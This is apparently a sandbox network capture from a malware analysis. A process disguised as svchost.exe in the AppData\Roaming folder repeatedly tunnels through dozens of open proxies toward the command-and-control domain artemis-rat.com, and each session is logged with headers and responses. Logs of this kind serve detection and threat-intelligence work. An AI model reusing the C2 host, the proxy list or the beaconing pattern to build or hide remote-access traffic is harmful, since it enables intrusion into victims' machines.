                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2812192.168.2.55913194.30.152.1728043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.881721973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.677220106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2813192.168.2.5591593.122.84.99312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.892164946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.197896957 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2814192.168.2.559138115.239.234.43730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.893337965 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:32.229007959 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2815192.168.2.558345155.185.15.56312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.917478085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.266036987 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2816192.168.2.55915784.39.112.144312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.941520929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2817192.168.2.559130203.95.198.170808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.941714048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2818192.168.2.556402117.54.201.94567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.941812992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2819192.168.2.559152111.90.150.109108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.941819906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2820192.168.2.556437104.248.151.2206364843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.942547083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.380512953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.117474079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2821192.168.2.5591748.218.231.621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.946300030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2822192.168.2.559136167.172.86.461047143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.947943926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2823192.168.2.559155138.36.150.16108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.948853970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2824192.168.2.55917145.11.95.166600243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.949290991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.052037001 CET39INHTTP/1.0 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2825192.168.2.5593828.219.135.2344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.966583014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2826192.168.2.5593848.219.135.2344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.967948914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2827192.168.2.5593858.219.135.2344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.968702078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2828192.168.2.5593908.219.135.2344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.971224070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2829192.168.2.559292172.67.182.1658043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.977451086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.132137060 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2830192.168.2.559293104.19.247.628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.977824926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.132172108 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2831192.168.2.55666531.42.184.1465775243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.982534885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.145720005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146526098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2832192.168.2.559301185.162.229.1128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.982800961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.137459993 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2833192.168.2.55925945.196.150.195543243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.983925104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.200871944 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2834192.168.2.559180103.49.202.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.995311975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2835192.168.2.559318185.162.231.2548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.997790098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.151940107 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2836192.168.2.558112120.194.4.1578243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.017930031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.722281933 CET319INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 170
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2837192.168.2.55919943.155.142.1161567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.024840117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2838192.168.2.559187103.231.78.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.024840117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.815725088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2839192.168.2.5591988.219.228.1001567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.044306993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2840192.168.2.559342104.21.80.838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.044348955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.199162960 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2841192.168.2.559238195.154.172.161312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.044523001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2842192.168.2.55920060.190.68.154730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.047000885 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:32.382718086 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2843192.168.2.559310129.213.150.2058043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.057998896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
